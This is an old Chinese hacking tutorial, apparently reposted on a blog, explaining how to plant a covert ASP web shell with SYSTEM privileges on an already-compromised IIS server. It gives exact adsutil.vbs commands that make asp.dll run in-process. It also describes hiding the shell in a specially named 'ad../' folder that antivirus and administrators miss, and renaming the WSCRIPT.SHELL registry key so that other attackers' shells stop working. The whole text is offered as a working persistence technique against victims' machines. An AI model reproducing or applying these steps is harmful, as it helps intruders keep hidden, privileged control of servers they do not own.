利用adsutil.vbs+../+cmd.asp打造完美后门(alpha)



本文作者:alpha
文章出处:未知
文章性质:原创
阅读次数:25
发布时间:2004-12-27
一直以来我们为做一个好的后门而郁闷着,那些现成的后门软件都很难逃脱杀毒软件的追杀,而自己写后门对我们这些小虫虫来是又似乎不太现实。下面我将教你一个方法,让你打造只属于你自己的后门!



所须工具:

一个cmd.asp足够了哟,自己写一个或者是找一个都行,不过建议自己写一个其实很简单的哟!而且自己写的还不会被杀掉。光盘里有一个我自己写的cmd.asp很详细的注释哟,你可以看看!



打造过程:

假设你已经攻下了一台机子。

好了开始开工了!

相信大家还都记得原来有一篇文章里说把iis里的应用程序保护设置成:低(iis进程) 然后运行的asp木马就有system权限了吧!

我们将把他设置成:中(共用的),然后仍然让我们的cmd.asp以system权限运行。(图1)


这就用到adsutil.vbs这个工具了。

Adsutil.vbs是系统自带的一个工具,用来管理iis的,一般在c:/inetpub/adminscripts下。

至于adsutil.vbs的具体使用在这里不再阐述,请自己在网上去查哟!

其中

在应用程序保护设置为“中”的情况下:LM/W3SVC/InProcessIsapiApps,进程内启动ISAPI。LM/W3SVC/InProcessIsapiApps是一个数组,里面包含的是一组指向一些ISAPI的路径。在这个数组里面的ISAPI运行的时候都是由inetinfo.exe直接启动的,继承inetinfo.exe的local system权限;而不在其中的ISAPI则是由svchost.exe派生的dllhost.exe进程启动的,运行的身份是IWAM_NAME,然而我们要做的就是手动添加asp.dll到这里。

注意这个里面的东西不能添加,只能覆盖!!

执行:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps

看看原来都有那些:(图2)


然后执行:cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:/WINDOWS/system32/inetsrv/httpext.dll" "C:/WINDOWS/system32/inetsrv/httpodbc.dll" "C:/WINDOWS/system32/inetsrv/ssinc.dll" "C:/WINDOWS/system32/msw3prt.dll" "C:/WINDOWS/Microsoft.NET/Framework/v1.1.4322/aspnet_isapi.dll" "C:/WINDOWS/system32/inetsrv/asp.dll"

注意各个值之间是用一个空格搁开的,不是回车!如下图(图3)




好了,这下应用程序保护设置为中也没有用了,我们还是system权限!

然后再让我们来打造一个杀毒软件杀不到,管理员找不到的文件夹把cmd.asp放进去!(图4)


让我们打开文件夹看看,你会神奇的发现aaa和aaa。(建立文件夹时的aaa../)文件夹里的都是1.txt(图5)


那2.txt去哪里了呢?实际上我们打开的aaa。文件夹实际进的是aaa文件夹。

而2.txt还是在真正的aaa../里面哟!而且这个文件夹用一般方法是删不掉的哟!

具体可参照我收录的一篇文章:让ASP木马不被杀.txt



好了利用这个原理,我们在肉鸡的建站目录里建立一个文件夹,假设他原由ad这个文件夹,我们建立一个ad../的文件夹,然后用copy命令把我们的cmd.asp给拷过去!

好了,现在我们已经有不被查杀不容易被发现的system后门了!

可是想过没有,如果别人也传了一个cmd.asp上去,那我们不是成了螳螂捕蝉黄雀在后里的螳螂了。不行,我们要打造只属于我自己的后门!



cmd.asp里有这么一句:

set oScript=server.createobject("WSCRIPT.SHELL")



这句可是核心哟,好了去注册表搜索WSCRIPT.SHELL项然后把他修改成你想要的,如WSCRIPT.SHELLshell 。(图6)

注意搜索的时候还会搜索到WSCRIPT.SHELL.1也应改改掉,不然就白忙活了哟!



然后把你的cmd.asp里面的

set oScript=server.createobject("WSCRIPT.SHELL")

改为

set oScript=server.createobject("WSCRIPT.SHELLshell")



好了,把cmd.asp拷进ad../

这样你就有自己的后门了。

访问后门的时候只需要输入http://host/ad../cmd.asp

就可以了

看一下我做的这个,(图7)


呵呵,还不错吧!



注:

以上截图是在2003下的,在2000下或许会有点不同,但是我在2000下测试过,成功了哟!

错误的地方请高手指正,不明白的地方到www.cnhack.cn与我讨论!

感谢nsfocus的tombkeeper。



-----文中有几个地方为了读者和编辑看清楚用“。”代替了”.”。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值